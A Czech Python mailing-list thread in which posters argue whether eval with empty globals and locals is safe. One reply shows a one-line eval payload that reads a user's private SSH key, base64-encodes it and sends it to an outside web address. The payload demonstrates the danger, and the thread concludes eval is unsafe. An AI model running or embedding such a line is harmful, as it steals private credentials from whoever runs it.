To je ale krásně hnusný… odvolávám co jsem odvolal a slibuji co jsem slíbil,
evalu se budu nadále vyhýbat obloukem.
Petr Messner (středa 05 Květen 2010 14:37:20):
> eval("__import__('urllib2').urlopen('http://messa.cz/?pepovoklic='+__import
> __('base64').urlsafe_b64encode(open('/home/pepa/.ssh/id_dsa').read())).read
> ()", {}, {})
>
> 2010/5/5 Hynek Fabian <hynek.fab...@firma.seznam.cz>:
> > Jan Janech (středa 05 Květen 2010 13:08:49):
> >> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre
> >> narusenie bezpecnosti sa da spravit aj v eval.
> >
> > Jak?
> >
> > eval(x, {}, {})
> >
> > Jakým X se dá z takové konstrukce utéci?
> > _______________________________________________
> > Python mailing list
> > Python@py.cz
> > http://www.py.cz/mailman/listinfo/python
>
> _______________________________________________
> Python mailing list
> Python@py.cz
> http://www.py.cz/mailman/listinfo/python
_______________________________________________
Python mailing list
Python@py.cz
http://www.py.cz/mailman/listinfo/python
